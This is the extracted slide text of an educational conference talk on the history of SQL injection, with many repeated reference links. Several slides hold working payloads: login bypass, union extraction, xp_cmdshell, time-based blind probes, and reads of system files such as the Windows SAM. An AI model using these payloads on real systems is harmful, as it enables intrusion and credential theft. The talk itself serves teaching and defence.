Chema Alonso - Hachetetepe dospuntos slaac slaac [Rooted CON 2013]
Chema Alonso
Transcript of Chema Alonso
-
8/10/2019 Chema Alonso
1/51
Feliz 15 aniversario, SQL Injection!
-
8/10/2019 Chema Alonso
2/51
What this talk is not about?
-
8/10/2019 Chema Alonso
3/51
What this talk is not about?
-
8/10/2019 Chema Alonso
4/51
What this talk is not about?
-
8/10/2019 Chema Alonso
5/51
This is about Love
-
8/10/2019 Chema Alonso
6/51
Los Amantes del Crculo Polar
-
8/10/2019 Chema Alonso
7/51
25Dec1998: El nacimiento
http://www.phrack.org/issues.html?id=8&issue=54
http://www.phrack.org/issues.html?id=8&issue=54http://www.phrack.org/issues.html?id=8&issue=54 -
8/10/2019 Chema Alonso
8/51
Begining
-
8/10/2019 Chema Alonso
9/51
Tautology
q=Select uid from users where uid=+$user+ and pass=+pass+;
admin
or 1=1
q=Select uid from users where uid=admin and pass= or 1=1;
-
8/10/2019 Chema Alonso
10/51
14Aug2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerabilityhttp://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability -
8/10/2019 Chema Alonso
11/51
Place
-
8/10/2019 Chema Alonso
12/51
Inband
-1 union select 1,1,1,1,username,1,a,1 from users --
-
8/10/2019 Chema Alonso
13/51
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.dochttp://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc -
8/10/2019 Chema Alonso
14/51
Yesterday - [Microsoft][ODBC SQL Server Driver]
[SQL Server]Incorrect syntax near the keyword 'or'.
q=Select title from noticias where ud=+$id+;
Id=1 or 1=(select top 1 username from sysusers) --
-
8/10/2019 Chema Alonso
15/51
Jul2007: Microsoft Partner Programme
-
8/10/2019 Chema Alonso
16/51
2002Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdfhttps://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf -
8/10/2019 Chema Alonso
17/51
Advanced Tricks
Id= 1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
-
8/10/2019 Chema Alonso
18/51
27Mar - 2007
-
8/10/2019 Chema Alonso
19/51
Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
-
8/10/2019 Chema Alonso
20/51
Eyes of Fear
-
8/10/2019 Chema Alonso
21/51
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
-
8/10/2019 Chema Alonso
22/51
2010US Army
-
8/10/2019 Chema Alonso
23/51
2010US Army
-
8/10/2019 Chema Alonso
24/51
Time
-
8/10/2019 Chema Alonso
25/51
2002Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
http://www.northernfortress.net/more_advanced_sql_injection.pdfhttp://www.northernfortress.net/more_advanced_sql_injection.pdf -
8/10/2019 Chema Alonso
26/51
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
-
8/10/2019 Chema Alonso
27/51
2004Time-Based in Other Databases
SQL Server
1) ; if wait for delay
2) ; exec xp_cmdshell (pingn)
Oracle
1) dms_lock.sleep()
PL/SLQ Injection
MySQL1) and sleep()
5.0 or higher
2) Benchmarck functions
Postgres:
1) pg:sleep()
-
8/10/2019 Chema Alonso
28/51
Jun2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.htmlhttp://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html -
8/10/2019 Chema Alonso
29/51
Apr2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.htmlhttp://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html -
8/10/2019 Chema Alonso
30/51
2007Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdfhttps://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf -
8/10/2019 Chema Alonso
31/51
Time-Based Using Heavy Queries in MS Access
True
False
-
8/10/2019 Chema Alonso
32/51
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/http://labs.portcullis.co.uk/application/deep-blind-sql-injection/ -
8/10/2019 Chema Alonso
33/51
Ace
-
8/10/2019 Chema Alonso
34/51
Serialized SQL Injection
union select '1','2','3',(select * from sysusers for xml raw, binary base64)
pass=
-
8/10/2019 Chema Alonso
35/51
Inverted Queries - Lefties
q=Select uid from users where +$user+=user and +pass+ pass;
-
8/10/2019 Chema Alonso
36/51
Airthmetic Blind SQL Injection
Id=A+(1/(ASCII(B)-C))
Id=A+ASCII(B)-C
Id=A+((C/ASCII(B))*(K))
-
8/10/2019 Chema Alonso
37/51
RFD (Remote File Downloading)SQL Server 2K
And 200>ASCII (SUBSTRING(SELECT * FROM
OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt;
*.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt),1,1))
; Create Table TempTable as (row varchar(8000)) --
; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n',
ROWTERMINATOR = '\n) --
; alter table TempTable add num int IDENTITY(1,1) NOT NULL
and (select COUNT(row) from TempTable)
and (select top 1 len(row) from TempTable where num = rownum)
and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num
= 1)
; Drop Table TempTable--
-
8/10/2019 Chema Alonso
38/51
RFD (Remote File Downloading)SQL Server 2K5++
AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK
'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))
-
8/10/2019 Chema Alonso
39/51
RFD (Remote File Downloading)MySQL
LoadFile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
Load Data infile
; Create table C8DFC643 (datos varchar(4000))
; Load data infile 'c:\\boot.ini' into table C8DFC643
; alter table C8DFC643 add column num integer auto_incrementunique key
and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1)
and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
; Drop table C8DFC643
-
8/10/2019 Chema Alonso
40/51
RFD (Remote File Downloading)Oracle
External Tables & Plain Text Files
; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; -- ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization
external (TYPE ORACLE_LOADER default directory A4A9308C access parameters (
records delimited by newline ) location (''boot.ini''))'; end;--
DBMS_LOB
; execute immediate DECLARE l_bfile BFILE;
l_blob BLOB;
BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO
l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;
; end; --
-
8/10/2019 Chema Alonso
41/51
CSRF+SQLi
-
8/10/2019 Chema Alonso
42/51
Smuggling
/**/aNd/**/1=aSC(substr(user(),1,1))%00
-
8/10/2019 Chema Alonso
43/51
Braveness
-
8/10/2019 Chema Alonso
44/51
Connection String Parameter Pollution
http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf
http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdfhttp://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf -
8/10/2019 Chema Alonso
45/51
XPath Injection
http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf
http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdfhttp://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdfhttp://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdfhttp://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf -
8/10/2019 Chema Alonso
46/51
LDAP Injection
http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdfhttp://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf -
8/10/2019 Chema Alonso
47/51
OWASP TOP 10 - 2013
-
8/10/2019 Chema Alonso
48/51
Forbidden
q=Select uid from users where uid=+$user+ and pass=+pass+;
-
8/10/2019 Chema Alonso
49/51
Use Brain not tech
PHP Magic Quotes? -> id=1 and 1=1
Python? -> No invulnerable
.NET? -> No invulnerable
LinQ? -> No invulnerable
-
8/10/2019 Chema Alonso
50/51
Fixing Code Injections isnt the worst job
-
8/10/2019 Chema Alonso
51/51
More
@chemaalonso
http://www.elladodelmal.com
http://www.elladodelmal.com/http://www.elladodelmal.com/http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.htmlhttp://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html